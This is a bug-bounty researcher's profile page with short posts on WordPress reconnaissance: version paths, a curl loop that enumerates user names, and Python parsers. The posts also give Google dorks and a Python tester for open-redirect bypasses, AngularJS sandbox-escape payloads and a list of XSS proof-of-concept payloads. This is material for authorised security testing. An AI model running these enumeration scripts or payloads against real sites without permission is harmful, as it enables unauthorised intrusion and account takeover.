MiguelSantareno | Security Researcher Profile
Security researcher MiguelSantareno has already helped fix 1142 vulnerabilities.
Researcher reputation: 240
Real name:
Miguel Santareno
About me:
Public work and profiles:
https://miguelsantareno.github.io/
https://hackerone.com/miguel_santareno
https://www.intigriti.com/profile/miguelsantareno
https://yeswehack.com/hunters/miguelsantareno
https://bugcrowd.com/MiguelSantareno
Contact email:
m1ke460 at hotmail dot com
Alternative Contacts:
https://twitter.com/MiguelSantareno
https://www.linkedin.com/in/miguelsantareno
Certifications & Diplomas:
eCPPT
eWPT
CSIL-CDWI
CSIL-COA
CEH
CPTE
CVE-2022-23377
CVE-2022-23865
Experience in Application Security
1-3 years
Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.
Halls of Fame:
Ericsson
Oracle
Cisco
EC-Council
ASUS
Atos
SAP
Nokia
Hitachi
SonicWall
Siemens
Microsoft
United Nations
Trend Micro
BMW
AT&T
CERT-EU
etc...
Ethics and Rules:
Miguel Santareno is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.
Recommendations and Acknowledgements
Miguel Santareno made us aware of several security vulnerabilities across several sections of our platform that needed to be rectified because they were a security risk. It was a pleasure working with him and I hope we can work again in the future. Thank you!
Thanks to Miguel, who reported an XSS vulnerability in one of our websites. Excellent service. The problem is now solved and tested. Great help, many thanks.
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel!
Miguel helped us to identify several bugs in our WordPress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much!
Miguel found an important security issue in our webpage and sent us very good information about solutions. Thanks a lot.
Miguel found an issue in our WordPress site and was quick to report it. Thank you.
Miguel has found an XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue, and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
Identified an XSS vulnerability in one website and showed us where it is. After that, made changes in code to solve it. All solved. Great help, great support.
Honor Badges (badge tiers as listed on the profile):
Number of Secured Websites:
10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN (1000+ Websites)
Advanced Security Research:
WAF Bypasser
CSRF Master (30+ Reports)
AppSec Logic Master (30+ Reports)
Fastest Fix (Fix in 24 hours)
Outstanding Achievements:
Secured OBB
OBB Advocate
Improved OBB
Commitment to Remediate and Patch:
Patch Master (55% Patched)
Patch Guru (65% Patched)
Patch Lord (75% Patched)
Recommendations and Recognition:
REPUTABLE (10+ Recommends)
FAMOUS (25+ Recommends)
GLOBALLY TRUSTED (50+ Recommends)
Distinguished Blog Author:
1 Post
3 Posts
5+ Posts
Research Statistics
Total reports: 1450
Total reports on VIP sites: 97
Total patched vulnerabilities: 1142
Recommendations received: 20
Active since: 20.06.2017
05.09.2019 WordPress basic auditing
WordPress readme (prints the installed version):
target/readme.html
WordPress license (the copyright year range narrows down the release):
target/license.txt
WordPress sample config:
target/wp-config-sample.php
WordPress installation script:
target/wp-admin/install.php
WordPress upgrade script:
target/wp-admin/upgrade.php
WordPress setup config script:
target/wp-admin/setup-config.php
WordPress REST API useful paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - REST API index
Script to enumerate users through the blog's author IDs (target/?author=N redirects to the author archive, whose links carry a "View all posts by <user>" title; the last field of each matching line is the user name):
for i in {1..30}; do curl -s -L -i "target/?author=$i" | grep -E -o "\" title=\"View all posts by [a-zA-Z0-9._-]+|Location:.*" | sed 's/\// /g' | awk '{print $NF}' | grep -v "^$"; done
WordPress plugin readme or license:
target/wp-content/plugins/plugin-name/readme.txt or /license.txt
WordPress theme readme, changelog or license:
target/wp-content/themes/theme-name/readme.txt, /changelog.txt or /license.txt
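The paths above are only useful once you parse what comes back. The following is an added example (not the profile author's code) that takes the raw responses a tester would fetch from readme.html, /wp-json/wp/v2/users and /?author=N and pulls out the WordPress version and the user names; it also recognises the "View all posts by" title the curl one-liner greps for. All sample responses are constructed for this example, and the function and constant names are this example's own, not WordPress API names.

```python
"""Offline parsers for the WordPress fingerprinting paths listed above.

Added example, not the profile author's code. Sample responses below are
constructed; function/constant names are this example's own.
"""
import json
import re
from typing import Optional

# The paths from the notes above, relative to the site root.
PROBE_PATHS = (
    "readme.html",
    "license.txt",
    "wp-config-sample.php",
    "wp-admin/install.php",
    "wp-admin/upgrade.php",
    "wp-admin/setup-config.php",
    "wp-json",
    "wp-json/wp/v2/users",
    "wp-json/wp/v2/posts",
)

# Constructed sample of readme.html: WordPress prints its version near the top.
README_HTML = (
    '<h1 id="logo"><a href="https://wordpress.org/">WordPress</a></h1>\n'
    '<p style="text-align: center">Version 5.2.3</p>\n'
)

# Constructed sample of /wp-json/wp/v2/users; "slug" is normally the login name.
USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://target/author/admin/"},
    {"id": 2, "name": "J. Doe", "slug": "jdoe", "link": "https://target/author/jdoe/"},
])

# Constructed sample headers for /?author=1 (redirect leaks the slug)
# and /?author=7 (no such author, so no redirect).
AUTHOR_REDIRECT = "HTTP/1.1 301 Moved Permanently\r\nLocation: https://target/author/admin/\r\n\r\n"
AUTHOR_MISSING = "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"

# Constructed sample of an author archive page carrying the same
# "View all posts by <user>" title the curl one-liner above greps for.
AUTHOR_PAGE_HTML = '<a href="https://target/author/jdoe/" title="View all posts by jdoe" rel="author">jdoe</a>'


def probe_urls(base: str) -> list:
    """Build the full list of URLs to request for a given site root."""
    base = base.rstrip("/")
    return [f"{base}/{p}" for p in PROBE_PATHS]


def version_from_readme(html: str) -> Optional[str]:
    """Return the 'Version X.Y[.Z]' string printed in readme.html, if present."""
    m = re.search(r"\bVersion\s+(\d+(?:\.\d+)+)", html)
    return m.group(1) if m else None


def users_from_rest(body: str) -> list:
    """Return (id, slug) pairs from the /wp-json/wp/v2/users response."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):  # e.g. {"code": "rest_user_cannot_view", ...}
        return []
    return [(u.get("id"), u.get("slug")) for u in data if isinstance(u, dict) and "slug" in u]


def user_from_author_redirect(raw_headers: str) -> Optional[str]:
    """Extract the author slug from the Location header of /?author=N."""
    m = re.search(r"^Location:\s*\S*?/author/([^/\s]+)", raw_headers, re.I | re.M)
    return m.group(1) if m else None


def users_from_author_page(html: str) -> list:
    """Extract user names from 'View all posts by <user>' titles in an author archive."""
    return sorted(set(re.findall(r'title="View all posts by ([A-Za-z0-9._-]+)"', html)))


def fingerprint(readme: str, users_body: str, author_headers: list) -> dict:
    """Combine the individual parsers into one report for the target."""
    users = {slug for _, slug in users_from_rest(users_body)}
    for h in author_headers:
        slug = user_from_author_redirect(h)
        if slug:
            users.add(slug)
    return {"version": version_from_readme(readme), "users": sorted(users)}


if __name__ == "__main__":
    print(probe_urls("https://target"))
    print(fingerprint(README_HTML, USERS_JSON, [AUTHOR_REDIRECT, AUTHOR_MISSING]))
```

To run it against a live site, feed the bodies returned by requests to probe_urls() into the parsers; the REST users endpoint is often disabled, which is why the /?author=N redirect and the archive-page title are kept as fallbacks.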
05.09.2019 Payloads for all types of web attacks
02.04.2019 Google Dorks to find open redirects:
inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https
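A dork hit is only a candidate; the parameter still has to be tested. The following is an added example (not the profile author's code) that takes a URL found with one of the dorks above, substitutes the payload variants that commonly slip past naive redirect filters into its url/u/redirect/link parameter, and decides from the returned Location header whether the redirect leaves the target's hosts. It makes no network request: fetch_location is a callable the caller supplies, and naive_target is a constructed stand-in for a site whose filter only checks that the value starts with "/" or mentions its own host name. The sample URL, the host names and all function names are this example's own.

```python
"""Check whether a redirect parameter found by the dorks above is an open redirect.

Added example, not the profile author's code. Sample URLs and hosts are
constructed; naive_target stands in for a real site.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# The parameters the dorks above search for.
REDIRECT_PARAMS = ("url", "u", "redirect", "link")


def find_redirect_param(url: str):
    """Return the first dork-style redirect parameter present in the URL, or None."""
    names = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return next((p for p in REDIRECT_PARAMS if p in names), None)


def payload_variants(attacker_host: str, target_host: str) -> list:
    """Values that commonly slip past naive 'starts with /' or 'contains our host' filters."""
    return [
        f"https://{attacker_host}",                  # plain absolute URL
        f"//{attacker_host}",                        # scheme-relative
        f"/\\{attacker_host}",                       # browsers normalise the backslash to a slash
        f"https://{target_host}@{attacker_host}",    # target host as userinfo
        f"https://{target_host}.{attacker_host}",    # target host as a subdomain label
        f"https://{attacker_host}/{target_host}",    # target host in the path
    ]


def inject(url: str, param: str, value: str) -> str:
    """Return url with the given query parameter set to value."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = value
    return urlunsplit(parts._replace(query=urlencode(query)))


def redirect_leaves_site(location: str, allowed_hosts: set) -> bool:
    """True when the Location value resolves to a host outside allowed_hosts."""
    loc = location.strip().replace("\\", "/")   # mirror the browser's backslash handling
    if loc.startswith("//"):
        host = urlsplit("https:" + loc).hostname
    elif "://" in loc:
        host = urlsplit(loc).hostname
    else:
        return False                               # path-relative: stays on the site
    return host is not None and host.lower() not in {h.lower() for h in allowed_hosts}


def check_candidate(url: str, attacker_host: str, allowed_hosts: set, fetch_location) -> dict:
    """Map each payload variant to whether the target redirected off-site for it."""
    param = find_redirect_param(url)
    if param is None:
        return {}
    target_host = urlsplit(url).hostname or ""
    results = {}
    for value in payload_variants(attacker_host, target_host):
        location = fetch_location(inject(url, param, value))
        results[value] = redirect_leaves_site(location, allowed_hosts)
    return results


def naive_target(url: str) -> str:
    """Constructed stand-in for a site: echoes the parameter into Location if it
    starts with '/' or contains the site's host name, otherwise sends the user to '/'."""
    value = dict(parse_qsl(urlsplit(url).query)).get("url", "/")
    return value if value.startswith("/") or "target" in value else "/"


if __name__ == "__main__":
    results = check_candidate("https://target/login?url=https://target/home",
                              "evil.example", {"target"}, naive_target)
    for variant, leaked in results.items():
        print(f"{'OPEN' if leaked else 'safe'}  {variant}")
```

Against a real site, fetch_location would issue the request without following redirects (for example urllib with a handler that does not follow 3xx) and return the Location header verbatim; keep every legitimate host of the target in allowed_hosts so that a redirect to one of its own subdomains is not reported as a finding.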
02.04.2019 AngularJS cross-site scripting (sandbox escape) payloads, by affected version and author:
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
30.03.2019 List of basic cross-site scripting payloads
"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")>
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt
'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script>
><script>alert`1`</script>
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>